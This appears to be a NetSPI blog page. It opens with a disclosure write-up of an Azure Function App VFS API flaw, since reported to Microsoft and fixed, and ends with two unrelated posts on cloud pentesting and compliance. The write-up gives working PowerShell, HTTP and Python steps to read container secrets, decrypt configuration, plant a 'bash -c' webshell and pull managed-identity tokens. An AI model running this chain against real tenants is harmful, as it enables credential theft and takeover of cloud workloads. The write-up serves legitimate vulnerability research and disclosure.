An example of a file available at the root of the Function App within the Azure Portal.

Under the individual functions (HttpTrigger1), we can enter the Code + Test menu to see the source code for the function. Much like the code in an Automation Account Runbook, the function code is available to anyone with Reader permissions. We frequently find hardcoded credentials in this menu, so it’s a common place for us to look. 

A screenshot of the source for the function (HttpTrigger1).

Both file viewing options rely on an undocumented API that can be found by proxying your browser traffic while accessing the Azure Portal. The following management.azure.com API endpoint uses the VFS function to list files in the Function App:

https://management.azure.com/subscriptions/$SUB_ID/resourceGroups/tester/providers/Microsoft.Web/sites/vfspoc/hostruntime/admin/vfs//?relativePath=1&api-version=2021-01-15 

In the example above, $SUB_ID would be your subscription ID, and this is for the “vfspoc” Function App in the “tester” resource group.
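
If you have the Az PowerShell module handy (as used later in this post), the same endpoint can be queried in one line with Invoke-AzRestMethod, which attaches the ARM token for you. A minimal sketch using the same placeholder subscription, resource group, and app names:

# List files at the Function App root via the undocumented VFS endpoint (Reader was sufficient pre-fix). 
(Invoke-AzRestMethod -Method GET -Path "/subscriptions/$SUB_ID/resourceGroups/tester/providers/Microsoft.Web/sites/vfspoc/hostruntime/admin/vfs//?relativePath=1&api-version=2021-01-15").Content | ConvertFrom-Json 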

Identify and fix insecure Azure configurations. Explore NetSPI’s Azure Penetration Testing solutions.

Discovery of the Issue

Using the identified URL, we started enumerating available files in the output:

[
  {
    "name": "host.json",
    "size": 141,
    "mtime": "2022-08-02T19:49:04.6152186+00:00",
    "crtime": "2022-08-02T19:49:04.6092235+00:00",
    "mime": "application/json",
    "href": "https://vfspoc.azurewebsites.net/admin/vfs/host.
json?relativePath=1&api-version=2021-01-15",
    "path": "C:\\home\\site\\wwwroot\\host.json"
  },
  {
    "name": "HttpTrigger1",
    "size": 0,
    "mtime": "2022-08-02T19:51:52.0190425+00:00",
    "crtime": "2022-08-02T19:51:52.0190425+00:00",
    "mime": "inode/directory",
    "href": "https://vfspoc.azurewebsites.net/admin/vfs/Http
Trigger1%2F?relativePath=1&api-version=2021-01-15",
    "path": "C:\\home\\site\\wwwroot\\HttpTrigger1"
  }
]

As we can see above, this is the expected output. We can see the host.json file that is available in the Azure Portal, and the HttpTrigger1 function directory. At first glance, this may seem like nothing. While reviewing some function source code in client environments, we noticed that additional directories were being added to the Function App root directory to add libraries and supporting files for use in the functions. These files are not visible in the Portal if they’re in a directory (See “Secret Directory” below). The Portal menu doesn’t have folder handling built in, so these files seem to be invisible to anyone with the Reader role. 

Function app files menu not showing the secret directory in the file drop down.

By using the VFS APIs, we can view all the files in these application directories, including sensitive files that the Azure Function App Contributors might have assumed were hidden from Readers. While this is a minor information disclosure, we can take the issue further by modifying the “relativePath” parameter in the URL from a “1” to a “0”. 

Changing this parameter allows us to now see the direct file system of the container. In this first case, we’re looking at a Windows Function App container. As a test harness, we’ll use a little PowerShell to grab a “management.azure.com” token from our authenticated (as a Reader) Azure PowerShell module session, and feed that to the API for our requests to read the files from the vfspoc Function App. 

$mgmtToken = (Get-AzAccessToken -ResourceUrl "https://management.azure.com").Token 

(Invoke-WebRequest -Verbose:$false -Uri (-join ("https://management.azure.com/subscriptions/$SUB_ID/resourceGroups/tester/providers/Microsoft.Web/sites/vfspoc/hostruntime/admin/vfs//?relativePath=0&api-version=2021-01-15")) -Headers @{Authorization="Bearer $mgmtToken"}).Content | ConvertFrom-Json 

name   : data 
size   : 0 
mtime  : 2022-09-12T20:20:48.2362984+00:00 
crtime : 2022-09-12T20:20:48.2362984+00:00 
mime   : inode/directory 
href   : https://vfspoc.azurewebsites.net/admin/vfs/data%2F?relativePath=0&api-version=2021-01-15 
path   : D:\home\data 

name   : LogFiles 
size   : 0 
mtime  : 2022-09-12T20:20:02.5561162+00:00 
crtime : 2022-09-12T20:20:02.5561162+00:00 
mime   : inode/directory 
href   : https://vfspoc.azurewebsites.net/admin/vfs/LogFiles%2F?relativePath=0&api-version=2021-01-15 
path   : D:\home\LogFiles 

name   : site 
size   : 0 
mtime  : 2022-09-12T20:20:02.5701081+00:00 
crtime : 2022-09-12T20:20:02.5701081+00:00 
mime   : inode/directory 
href   : https://vfspoc.azurewebsites.net/admin/vfs/site%2F?relativePath=0&api-version=2021-01-15 
path   : D:\home\site 

name   : ASP.NET 
size   : 0 
mtime  : 2022-09-12T20:20:48.2362984+00:00 
crtime : 2022-09-12T20:20:48.2362984+00:00 
mime   : inode/directory 
href   : https://vfspoc.azurewebsites.net/admin/vfs/ASP.NET%2F?relativePath=0&api-version=2021-01-15 
path   : D:\home\ASP.NET

Access to Encryption Keys on the Windows Container

With access to the container’s underlying file system, we’re now able to browse into the ASP.NET directory on the container. This directory contains the “DataProtection-Keys” subdirectory, which houses XML files with the encryption keys for the application. 

Here’s an example URL and file for those keys:

https://management.azure.com/subscriptions/$SUB_ID/resourceGroups/tester/providers/Microsoft.Web/sites/vfspoc/hostruntime/admin/vfs//ASP.NET/DataProtection-Keys/key-ad12345a-e321-4a1a-d435-4a98ef4b3fb5.xml?relativePath=0&api-version=2018-11-01 

<?xml version="1.0" encoding="utf-8"?> 
<key id="ad12345a-e321-4a1a-d435-4a98ef4b3fb5" version="1"> 
  <creationDate>2022-03-29T11:23:34.5455524Z</creationDate> 
  <activationDate>2022-03-29T11:23:34.2303392Z</activationDate> 
  <expirationDate>2022-06-27T11:23:34.2303392Z</expirationDate> 
  <descriptor deserializerType="Microsoft.AspNetCore.DataProtection.AuthenticatedEncryption.ConfigurationModel.AuthenticatedEncryptorDescriptorDeserializer, Microsoft.AspNetCore.DataProtection, Version=3.1.18.0, Culture=neutral, PublicKeyToken=ace99892819abce50"> 
    <descriptor> 
      <encryption algorithm="AES_256_CBC" /> 
      <validation algorithm="HMACSHA256" /> 
      <masterKey p4:requiresEncryption="true" xmlns:p4="https://schemas.asp.net/2015/03/dataProtection"> 
        <!-- Warning: the key below is in an unencrypted form. --> 
        <value>a5[REDACTED]==</value> 
      </masterKey> 
    </descriptor> 
  </descriptor> 
</key> 

While we couldn’t use these keys during the initial discovery of this issue, there is potential for these keys to be abused for decrypting information from the Function App. Additionally, we have more pressing issues to look at in the Linux container.

Command Execution on the Linux Container

Since Function Apps can run in both Windows and Linux containers, we decided to spend a little time on the Linux side with these APIs. Using the same API URLs as before, we change them over to a Linux container function app (vfspoc2). As we see below, this same API (with “relativePath=0”) now exposes the Linux base operating system files for the container:

https://management.azure.com/subscriptions/$SUB_ID/resourceGroups/tester/providers/Microsoft.Web/sites/vfspoc2/hostruntime/admin/vfs//?relativePath=0&api-version=2021-01-15 

JSON output parsed into a PowerShell object: 
name   : lost+found 
size   : 0 
mtime  : 1970-01-01T00:00:00+00:00 
crtime : 1970-01-01T00:00:00+00:00 
mime   : inode/directory 
href   : https://vfspoc2.azurewebsites.net/admin/vfs/lost%2Bfound%2F?relativePath=0&api-version=2021-01-15 
path   : /lost+found 

[Truncated] 

name   : proc 
size   : 0 
mtime  : 2022-09-14T22:28:57.5032138+00:00 
crtime : 2022-09-14T22:28:57.5032138+00:00 
mime   : inode/directory 
href   : https://vfspoc2.azurewebsites.net/admin/vfs/proc%2F?relativePath=0&api-version=2021-01-15 
path   : /proc 

[Truncated] 

name   : tmp 
size   : 0 
mtime  : 2022-09-14T22:56:33.6638983+00:00 
crtime : 2022-09-14T22:56:33.6638983+00:00 
mime   : inode/directory 
href   : https://vfspoc2.azurewebsites.net/admin/vfs/tmp%2F?relativePath=0&api-version=2021-01-15 
path   : /tmp 

name   : usr 
size   : 0 
mtime  : 2022-09-02T21:47:36+00:00 
crtime : 1970-01-01T00:00:00+00:00 
mime   : inode/directory 
href   : https://vfspoc2.azurewebsites.net/admin/vfs/usr%2F?relativePath=0&api-version=2021-01-15 
path   : /usr 

name   : var 
size   : 0 
mtime  : 2022-09-03T21:23:43+00:00 
crtime : 2022-09-03T21:23:43+00:00 
mime   : inode/directory 
href   : https://vfspoc2.azurewebsites.net/admin/vfs/var%2F?relativePath=0&api-version=2021-01-15 
path   : /var 

Breaking out one of my favorite NetSPI blogs, Directory Traversal, File Inclusion, and The Proc File System, we know that we can potentially access environmental variables for different PIDs that are listed in the “proc” directory.  

Description of the function of the environ file in the proc file system.

If we request a listing of the proc directory, we can see that there are a handful of PIDs (denoted by the numbers) listed:

https://management.azure.com/subscriptions/$SUB_ID/resourceGroups/tester/providers/Microsoft.Web/sites/vfspoc2/hostruntime/admin/vfs//proc/?relativePath=0&api-version=2021-01-15 

JSON output parsed into a PowerShell object: 
name   : fs 
size   : 0 
mtime  : 2022-09-21T22:00:39.3885209+00:00 
crtime : 2022-09-21T22:00:39.3885209+00:00 
mime   : inode/directory 
href   : https://vfspoc2.azurewebsites.net/admin/vfs/proc/fs/?relativePath=0&api-version=2021-01-15 
path   : /proc/fs 

name   : bus 
size   : 0 
mtime  : 2022-09-21T22:00:39.3895209+00:00 
crtime : 2022-09-21T22:00:39.3895209+00:00 
mime   : inode/directory 
href   : https://vfspoc2.azurewebsites.net/admin/vfs/proc/bus/?relativePath=0&api-version=2021-01-15 
path   : /proc/bus 

[Truncated] 

name   : 1 
size   : 0 
mtime  : 2022-09-21T22:00:38.2025209+00:00 
crtime : 2022-09-21T22:00:38.2025209+00:00 
mime   : inode/directory 
href   : https://vfspoc2.azurewebsites.net/admin/vfs/proc/1/?relativePath=0&api-version=2021-01-15 
path   : /proc/1 

name   : 16 
size   : 0 
mtime  : 2022-09-21T22:00:38.2025209+00:00 
crtime : 2022-09-21T22:00:38.2025209+00:00 
mime   : inode/directory 
href   : https://vfspoc2.azurewebsites.net/admin/vfs/proc/16/?relativePath=0&api-version=2021-01-15 
path   : /proc/16 

[Truncated] 

name   : 59 
size   : 0 
mtime  : 2022-09-21T22:00:38.6785209+00:00 
crtime : 2022-09-21T22:00:38.6785209+00:00 
mime   : inode/directory 
href   : https://vfspoc2.azurewebsites.net/admin/vfs/proc/59/?relativePath=0&api-version=2021-01-15 
path   : /proc/59 

name   : 1113 
size   : 0 
mtime  : 2022-09-21T22:16:09.1248576+00:00 
crtime : 2022-09-21T22:16:09.1248576+00:00 
mime   : inode/directory 
href   : https://vfspoc2.azurewebsites.net/admin/vfs/proc/1113/?relativePath=0&api-version=2021-01-15 
path   : /proc/1113 

name   : 1188 
size   : 0 
mtime  : 2022-09-21T22:17:18.5695703+00:00 
crtime : 2022-09-21T22:17:18.5695703+00:00 
mime   : inode/directory 
href   : https://vfspoc2.azurewebsites.net/admin/vfs/proc/1188/?relativePath=0&api-version=2021-01-15 
path   : /proc/1188

For the next step, we can use PowerShell to request the “environ” file from PID 59 to get the environmental variables for that PID. We will then write it to a temp file and “get-content” the file to output it.

$mgmtToken = (Get-AzAccessToken -ResourceUrl "https://management.azure.com").Token 

Invoke-WebRequest -Verbose:$false -Uri (-join ("https://management.azure.com/subscriptions/$SUB_ID/resourceGroups/tester/providers/Microsoft.Web/sites/vfspoc2/hostruntime/admin/vfs//proc/59/environ?relativePath=0&api-version=2021-01-15")) -Headers @{Authorization="Bearer $mgmtToken"} -OutFile .\TempFile.txt 

gc .\TempFile.txt 

PowerShell Output - Newlines added for clarity: 
CONTAINER_IMAGE_URL=mcr.microsoft.com/azure-functions/mesh:3.13.1-python3.7 
REGION_NAME=Central US  
HOSTNAME=SandboxHost-637993944271867487  
[Truncated] 
CONTAINER_ENCRYPTION_KEY=bgyDt7gk8COpwMWMxClB7Q1+CFY/a15+mCev2leTFeg=  
LANG=C.UTF-8  
CONTAINER_NAME=E9911CE2-637993944227393451 
[Truncated]
CONTAINER_START_CONTEXT_SAS_URI=https://wawsstorageproddm1157.blob.core.windows.net/azcontainers/e9911ce2-637993944227393451?sv=2014-02-14&sr=b&sig=5ce7MUXsF4h%2Fr1%2BfwIbEJn6RMf2%2B06c2AwrNSrnmUCU%3D&st=2022-09-21T21%3A55%3A22Z&se=2023-09-21T22%3A00%3A22Z&sp=r
[Truncated]

In the output, we can see that there are a couple of interesting variables. 

  • CONTAINER_ENCRYPTION_KEY 
  • CONTAINER_START_CONTEXT_SAS_URI 

The encryption key variable is self-explanatory, and the SAS URI should be familiar to anyone who has read Jake Karnes’ post on attacking Azure SAS tokens. If we navigate to the SAS token URL, we’re greeted with an “encryptedContext” JSON blob. Conveniently, we have the encryption key used for this data. 

A screenshot of an "encryptedContext" JSON blob with the encryption key.

Using CyberChef, we can quickly pull together the pieces to decrypt the data. In this case, the IV is the first portion of the JSON blob (“Bad/iquhIPbJJc4n8wcvMg==”). We know the key (“bgyDt7gk8COpwMWMxClB7Q1+CFY/a15+mCev2leTFeg=”), so we will just use the middle portion of the Base64 JSON blob as our input.  

Here’s what the recipe looks like in CyberChef: 

An example of using CyberChef to decrypt data from a JSON blob.
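
If you would rather stay in the terminal, the same decryption can be sketched in a few lines of PowerShell. This assumes AES-256-CBC with PKCS7 padding (consistent with the key and IV sizes above); the ciphertext value is a placeholder for the middle, Base64-encoded portion of the encryptedContext blob:

# Placeholders: paste the IV, key, and ciphertext portions pulled from the blob. 
$ivB64     = "Bad/iquhIPbJJc4n8wcvMg==" 
$keyB64    = "bgyDt7gk8COpwMWMxClB7Q1+CFY/a15+mCev2leTFeg=" 
$cipherB64 = "<middle Base64 portion of the encryptedContext blob>" 

$aes         = [System.Security.Cryptography.Aes]::Create() 
$aes.Mode    = [System.Security.Cryptography.CipherMode]::CBC 
$aes.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7   # assumed padding 
$aes.Key     = [Convert]::FromBase64String($keyB64) 
$aes.IV      = [Convert]::FromBase64String($ivB64) 

$cipher = [Convert]::FromBase64String($cipherB64) 
$plain  = $aes.CreateDecryptor().TransformFinalBlock($cipher, 0, $cipher.Length) 
[Text.Encoding]::UTF8.GetString($plain) 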

Once decrypted, we have another JSON blob of data, now with only one encrypted chunk (“EncryptedEnvironment”). We won’t be dealing with that data as the important information has already been decrypted below. 

{"SiteId":98173790,"SiteName":"vfspoc2", 
"EncryptedEnvironment":"2 | Xj[REDACTED]== | XjAN7[REDACTED]KRz", 
"Environment":{"FUNCTIONS_EXTENSION_VERSION":"~3", 
"APPSETTING_FUNCTIONS_EXTENSION_VERSION":"~3", 
"FUNCTIONS_WORKER_RUNTIME":"python", 
"APPSETTING_FUNCTIONS_WORKER_RUNTIME":"python", 
"AzureWebJobsStorage":"DefaultEndpointsProtocol=https;AccountName=
storageaccountfunct9626;AccountKey=7s[REDACTED]uA==;EndpointSuffix=
core.windows.net", 
"APPSETTING_AzureWebJobsStorage":"DefaultEndpointsProtocol=https;
AccountName=storageaccountfunct9626;AccountKey=7s[REDACTED]uA==;
EndpointSuffix=core.windows.net", 
"ScmType":"None", 
"APPSETTING_ScmType":"None", 
"WEBSITE_SITE_NAME":"vfspoc2", 
"APPSETTING_WEBSITE_SITE_NAME":"vfspoc2", 
"WEBSITE_SLOT_NAME":"Production", 
"APPSETTING_WEBSITE_SLOT_NAME":"Production", 
"SCM_RUN_FROM_PACKAGE":"https://storageaccountfunct9626.blob.core.
windows.net/scm-releases/scm-latest-vfspoc2.zip?sv=2014-02-14&sr=b&
sig=%2BN[REDACTED]%3D&se=2030-03-04T17%3A16%3A47Z&sp=rw", 
"APPSETTING_SCM_RUN_FROM_PACKAGE":"https://storageaccountfunct9626.
blob.core.windows.net/scm-releases/scm-latest-vfspoc2.zip?sv=2014-
02-14&sr=b&sig=%2BN[REDACTED]%3D&se=2030-03-04T17%3A16%3A47Z&sp=rw", 
"WEBSITE_AUTH_ENCRYPTION_KEY":"F1[REDACTED]25", 
"AzureWebEncryptionKey":"F1[REDACTED]25", 
"WEBSITE_AUTH_SIGNING_KEY":"AF[REDACTED]DA", 
[Truncated] 
"FunctionAppScaleLimit":0,"CorsSpecializationPayload":{"Allowed
Origins":["https://functions.azure.com", 
"https://functions-staging.azure.com", 
"https://functions-next.azure.com"],"SupportCredentials":false},
"EasyAuthSpecializationPayload":{"SiteAuthEnabled":true,"SiteAuth
ClientId":"18[REDACTED]43", 
"SiteAuthAutoProvisioned":true,"SiteAuthSettingsV2Json":null}, 
"Secrets":{"Host":{"Master":"Q[REDACTED]=","Function":{"default":
"k[REDACTED]="}, 
"System":{}},"Function":[]}} 

The important things to highlight here are: 

  • AzureWebJobsStorage and APPSETTING_AzureWebJobsStorage 
  • SCM_RUN_FROM_PACKAGE and APPSETTING_SCM_RUN_FROM_PACKAGE 
  • Function App “Master” and “Default” secrets 

It should be noted that the “MICROSOFT_PROVIDER_AUTHENTICATION_SECRET” will also be available if the Function App has been set up to authenticate users via Azure AD. This is an App Registration credential that might be useful for gaining access to the tenant. 

While the jobs storage information is a nice way to get access to the Function App Storage Account, we will be more interested in the Function “Master” App Secret, as that can be used to overwrite the functions in the app. By overwriting the functions, we can get full command execution in the container. This would also allow us to gain access to any attached Managed Identities on the Function App. 

For our Proof of Concept, we’ll use the baseline PowerShell “hello” function as our template to overwrite: 

A screenshot of the PowerShell "hello" function.

This basic function just returns the “Name” submitted from a request parameter. For our purposes, we’ll convert this over to a Function App webshell (of sorts) that uses the “Name” parameter as the command to run.

using namespace System.Net 

# Input bindings are passed in via param block. 
param($Request, $TriggerMetadata) 

# Write to the Azure Functions log stream. 
Write-Host "PowerShell HTTP trigger function 
processed a request." 

# Interact with query parameters or the body of the request. 
$name = $Request.Query.Name 
if (-not $name) { 
    $name = $Request.Body.Name 
} 

$body = "This HTTP triggered function executed successfully. 
Pass a name in the query string or in the request body for a 
personalized response." 

if ($name) { 
    $cmdoutput = [string](bash -c $name) 
    $body = (-join("Executed Command: ",$name,"`nCommand Output: 
",$cmdoutput)) 
} 

# Associate values to output bindings by calling 'Push-OutputBinding'. 
Push-OutputBinding -Name Response -Value ([HttpResponseContext]@{ 
    StatusCode = [HttpStatusCode]::OK 
    Body = $body 
}) 

To overwrite the function, we will use Burp Suite to send a PUT request with our new code. Before we do that, we need to make an initial request for the function code to get the associated ETag to use with the PUT request.

Initial GET of the Function Code:

GET /admin/vfs/home/site/wwwroot/HttpTrigger1/run.ps1 HTTP/1.1 
Host: vfspoc2.azurewebsites.net 
x-functions-key: Q[REDACTED]= 

HTTP/1.1 200 OK 
Content-Type: application/octet-stream 
Date: Wed, 21 Sep 2022 23:29:01 GMT 
Server: Kestrel 
ETag: "38aaebfb279cda08" 
Last-Modified: Wed, 21 Sep 2022 23:21:17 GMT 
Content-Length: 852 

using namespace System.Net 

# Input bindings are passed in via param block. 
param($Request, $TriggerMetadata) 
[Truncated] 
}) 

PUT Overwrite Request Using the ETag as the “If-Match” Header:

PUT /admin/vfs/home/site/wwwroot/HttpTrigger1/run.ps1 HTTP/1.1 
Host: vfspoc2.azurewebsites.net 
x-functions-key: Q[REDACTED]= 
Content-Length: 851 
If-Match: "38aaebfb279cda08" 

using namespace System.Net 

# Input bindings are passed in via param block. 
param($Request, $TriggerMetadata) 

# Write to the Azure Functions log stream. 
Write-Host "PowerShell HTTP trigger function processed a request." 

# Interact with query parameters or the body of the request. 
$name = $Request.Query.Name 
if (-not $name) { 
    $name = $Request.Body.Name 
} 

$body = "This HTTP triggered function executed successfully. Pass a name in the query string or in the request body for a personalized response." 

if ($name) { 
    $cmdoutput = [string](bash -c $name) 
    $body = (-join("Executed Command: ",$name,"`nCommand Output: ",$cmdoutput)) 
} 

# Associate values to output bindings by calling 'Push-OutputBinding'. 
Push-OutputBinding -Name Response -Value ([HttpResponseContext]@{ 
    StatusCode = [HttpStatusCode]::OK 
    Body = $body 
}) 


HTTP Response: 

HTTP/1.1 204 No Content 
Date: Wed, 21 Sep 2022 23:32:32 GMT 
Server: Kestrel 
ETag: "c243578e299cda08" 
Last-Modified: Wed, 21 Sep 2022 23:32:32 GMT

The server should respond with a 204 No Content, and an updated ETag for the file. With our newly updated function, we can start executing commands. 
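
The Burp Suite workflow above can also be scripted. Below is a minimal Python sketch of the same two requests, assuming the requests library; the host, master key placeholder, and local run.ps1 path are stand-ins for your own values:

import requests

host = "https://vfspoc2.azurewebsites.net"
vfs_path = "/admin/vfs/home/site/wwwroot/HttpTrigger1/run.ps1"
headers = {"x-functions-key": "<MASTER_KEY>"}  # Function App "Master" secret

# 1. GET the current function code to capture its ETag
resp = requests.get(host + vfs_path, headers=headers)
resp.raise_for_status()
etag = resp.headers["ETag"]

# 2. PUT the webshell code back, supplying the captured ETag as If-Match
with open("run.ps1", "rb") as f:  # local copy of the modified function
    payload = f.read()
resp = requests.put(host + vfs_path, headers={**headers, "If-Match": etag}, data=payload)
print(resp.status_code)  # expect 204 No Content on success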

Sample URL: 

https://vfspoc2.azurewebsites.net/api/HttpTrigger1?name=whoami&code=Q[REDACTED]= 

Browser Output: 

Browser output for the command "whoami."

Now that we have full control over the Function App container, we can potentially make use of any attached Managed Identities and generate tokens for them. In our case, we will just add the following PowerShell code to the function to set the output to the management token we’re trying to export. 

$resourceURI = "https://management.azure.com" 
$tokenAuthURI = $env:IDENTITY_ENDPOINT + "?resource=$resourceURI&api-version=2019-08-01" 
$tokenResponse = Invoke-RestMethod -Method Get -Headers @{"X-IDENTITY-HEADER"="$env:IDENTITY_HEADER"} -Uri $tokenAuthURI 
$body = $tokenResponse.access_token

Example Token Exported from the Browser: 

Example token exported from the browser.

For more information on taking over Azure Function Apps, check out this fantastic post by Bill Ben Haim and Zur Ulianitzky: 10 ways of gaining control over Azure function Apps.  

Conclusion 

Let’s recap the issue:  

  1. Start as a user with the Reader role on a Function App. 
  2. Abuse the undocumented VFS API to read arbitrary files from the containers.
  3. Access encryption keys on the Windows containers or access the “proc” files from the Linux container.
  4. Using the Linux container, read the process environment variables. 
  5. Use the variables to access configuration information in a SAS token URL. 
  6. Decrypt the configuration information with the variables. 
  7. Use the keys exposed in the configuration information to overwrite the function and gain command execution in the Linux container. 

All this being said, we submitted this issue through MSRC, and they were able to remediate the file access issues. The APIs are still there, so you may be able to get access to some of the Function App container and application files with the appropriate role, but the APIs are now restricted for the Reader role. 

MSRC timeline

The initial disclosure for this issue, focusing on Windows containers, was sent to MSRC on Aug 2, 2022. A month later, we discovered the additional impact related to the Linux containers and submitted a secondary ticket, as the impact was significantly higher than initially discovered and the different base container might require a different remediation.  

There were a few false starts on the remediation date, but eventually the vulnerable API was restricted for the Reader role on January 17, 2023. On January 24, 2023, Microsoft rolled back the fix after it caused some issues for customers. 

On March 6, 2023, Microsoft reimplemented the fix to address the issue. The rollout was completed globally on March 8. At the time of publishing, the Reader role no longer has the ability to read files with the Function App VFS APIs. It should be noted that the Linux escalation path is still a viable option if an attacker has command execution on a Linux Function App. 

Back

3 Fundamentals for a Strong Cloud Penetration Testing Program

Cloud computing has transformed the way organizations operate, providing unparalleled flexibility, scalability, and cost-efficiency. However, with these benefits come new security challenges and emerging risks. As organizations increasingly move their operations to the cloud, ensuring the security and privacy of data has become more critical than ever. A robust cloud penetration testing program helps internal IT teams protect their organizations by identifying and mitigating security risks in the cloud.

A pitfall organizations face when building a cloud pentesting strategy is handling rapid cloud migration. An application hosted on-prem will have significantly different security requirements from one in the cloud, and cloud security controls are often more complex and nuanced. Another pitfall is assuming that cloud services are secure by default. Even though the cloud provider manages some aspects of security, organizations are still responsible for understanding exactly what is within their control to secure, and the provider's default settings are not always the most secure choice for every environment. This differs from a traditional security program because of the shared responsibility or “shared fate” model.

With this model in mind, organizations need to look at the key components of a comprehensive cloud penetration testing program in light of their business objectives to implement a secure cloud effectively.

Best Practices to Create a Cloud Penetration Testing Program 

Creating a secure cloud is a complex undertaking with decisions that need to be tailored to your business goals and tech stack. Thomas Elling and the Cloud Pentesting team have compiled three aspects of creating a cloud pentesting program that will help any team incorporate security protocols from ideation to deployment.

1. Building a secure cloud from the start 

Making security-conscious design decisions from the start of a cloud adoption helps IT teams avoid retroactive decisions that result in rework and disjointed integration of technologies. It's important to consider this from both a human and a technical perspective. From the human lens, consider partnering security engineers and pentesters with DevOps groups to create secure-by-default environments. From a technical standpoint, consider adopting Infrastructure as Code (IaC) to help enforce a security baseline.

2. Performing regular configuration reviews and pentesting 

Regular configuration reviews and cloud pentesting exercises are extremely valuable because of their ability to focus remediation efforts on prioritized vulnerabilities. Identifying security misconfigurations is a critical first step to securing an environment, which makes configuration reviews so imperative. They should be done on a regular basis to identify factors such as inadvertent public access or excessive IAM permissions.

Pentesting is another integral part of cloud security which aims to demonstrate the impact of the identified misconfigurations. This often includes chaining misconfigurations together to prove privilege escalation. The key difference between this and a typical configuration review is the fact that pentests leverage misconfigurations to demonstrate the potential impact of a successful attack. Oftentimes, the full impact of a misconfiguration is not fully understood until it is paired with one or more other vulnerabilities in the environment.

3. Establishing security guardrails 

Guardrails are sets of automated policies and controls that are designed to prevent or mitigate security risks and ensure compliance with security standards and regulations. Results of configuration reviews and pentests should always be discussed to identify the root cause. If a vulnerability was introduced via configuration drift, one preventative action would be implementing a security guardrail to ensure that misconfigurations cannot be introduced in the future.

Whether your cloud infrastructure resides in AWS, Azure, or GCP, these three fundamentals will help internal teams build — and maintain — a secure cloud from all angles.

Refine Your Cloud Pentesting Program with NetSPI

These steps represent some of the basic ways to create a security-first cloud environment through regular review processes. While there is no one-size-fits-all approach, these points can be modified to fit any cloud environment. Ultimately, organizations should prioritize remediation of vulnerabilities with a risk-based approach.

Environments that carry higher risk, such as ones that deal with sensitive data or may have external exposure, would be candidates for more frequent reviews. One factor that could trigger a review is any fundamental change made by the cloud provider to a core service.

However, this is not to say that lower-risk environments, like a dev environment with test data, are unimportant. Escalation paths from dev environments into production can be extremely impactful. Lastly, organizations looking to build out and strengthen their cloud pentesting programs need to investigate the root cause of identified vulnerabilities to ensure that the same, or similar, issues do not happen again.

Working with a penetration testing partner to enhance cloud security can help streamline efforts and deliver value quickly. As a leader in offensive security, NetSPI helps companies establish and enhance their secure cloud strategies. Contact our security consultants to get started on a strong cloud penetration testing program.

Back

How to Build a Baseline Cybersecurity Posture with Security Compliance

NetSPI Field Chief Information Security Officer (CISO) and host of the Agent of Influence podcast, Nabil Hannan invited Senior Compliance Manager at Secureframe Marc Rubbinaccio on episode 53 to discuss how security fits into compliance, and vice versa.  

The conclusion? Compliance doesn’t equate to security, but it is a strong starting point. Cybersecurity compliance provides a trustworthy baseline to establish a more mature security posture, especially for companies that are beginning to build their cybersecurity program from the ground up.  

Dive into the highlights below, then head over to Agent of Influence and listen to the full episode. 

Secureframe is a part of the NetSPI Partner Program.
Click here to learn about the program and explore how to become a partner. 

Reframing the Mentality of Cybersecurity Compliance  

The sentiment around compliance often centers on meeting requirements, not building an effective security program — but Marc offers a refined perspective. He posits that this mentality may be more prevalent at enterprise organizations with advanced security processes, where the baseline security controls outlined in compliance become more of a check-the-box exercise than a preventative cybersecurity strategy. 

But following the baseline security controls outlined in security frameworks is a prime starting point for small businesses and growing organizations.  

Technology is evolving faster than compliance can keep up with, which has led the PCI DSS council to allow a more customized approach to meeting requirements. This allows companies to keep their current systems and implementations in place, without the need to invest in expensive new technologies. If companies can prove what they've implemented meets the intent of the requirement, then these revised standards within PCI DSS v4.0 allow security teams to stay the course. 

Choosing a Security Compliance Framework 

Common company activity that requires cybersecurity compliance includes storing, processing and transmitting data in a way that can impact the security of customer information. Marc advises listeners to first select a cybersecurity framework that could be required within their industry. For example, HIPAA for healthcare, or GDPR for organizations responsible for the privacy of European customer data. Choosing a security framework and sticking to it helps guide decisions throughout the many steps within a compliance journey. 

“In my opinion, SOC2 and ISO27001, these frameworks are an amazing way for startups and small businesses to build a baseline security posture that they can not only be proud of but also be confident that their customers’ data is indeed secure.”  

Marc Rubbinaccio, Secureframe

Marc recommends two frameworks for organizations starting their path toward cybersecurity compliance:  

  1. SOC 2: The American Institute of Certified Public Accountants (AICPA) centers the SOC 2 framework around five Trust Services Criteria: security, availability, processing integrity, confidentiality, and privacy. 
  2. ISO 27001: The International Organization for Standardization (ISO), in partnership with the International Electrotechnical Commission (IEC), developed ISO 27001 as a standard for managing information security. ISO 27001 encourages the adoption of an Information Security Management System (ISMS) to protect the confidentiality, integrity, and availability of information.  

These well-known security frameworks help organizations establish policies and procedures, access control, change management, and even risk management, resulting in an inherently stronger cybersecurity posture.

If defining the next steps toward a mature cybersecurity program is holding you back from making progress, NetSPI’s Security Advisory Services are here to propel you forward. Let’s have a conversation. 

Changes to PCI DSS v4.0 

Marc’s area of focus is PCI DSS, which recently released an updated version, PCI DSS v4.0. Changes include stricter multifactor authentication and stronger password security requirements, among others. The organizations most impacted by these changes are the ones maintaining Self-Assessment Questionnaire A (SAQ A), which is used when merchants outsource all aspects of payment processing, such as the capture, storage, and transmission of cardholder data, to a third-party service provider.  

These changes were driven by the increase in e-skimming attacks on payment pages, a technique used to intercept private information as it is entered into a web form. To help combat these increasing attacks, SAQ A now requires controls around any script executed in the customer's browser, in addition to external vulnerability scanning. 

With all of these never-ending changes, what can internal IT teams do to keep up with security compliance? 

“The strongest and most powerful tool you have are the experts that you work with.” 

Marc Rubbinaccio, Secureframe

How Organizations Can Prepare for Changes to Security Compliance 

Keeping up with all the changes to compliance standards is difficult, which is why leaning on the people and tools around you is essential. When looking at best practices for keeping up with changes to security compliance, use your connections as a resource.  

Whether your organization partners with a third party or uses a particular auditor, you can lean on these experts for guidance on decisions to adhere to your chosen framework. It's OK to reach out directly to your auditor to discuss the latest changes to the frameworks and how they may affect your environment as it stands today. These conversations will put you ahead of the game when it's time for your next audit. 

The Intersection of Pentesting and Security Compliance 

Penetration testing is critical in vulnerability management programs because it takes vulnerability scanning a step further. Scanners fingerprint operating system and software versions and compare them against publicly known vulnerable versions; some also perform fuzzing, mass-injecting data into input fields to discover vulnerabilities. They are a great tool for identifying assets and surface-level vulnerabilities, while pentesting uses the data found by scanners to try to exploit a vulnerability and continue to pivot within your environment. 

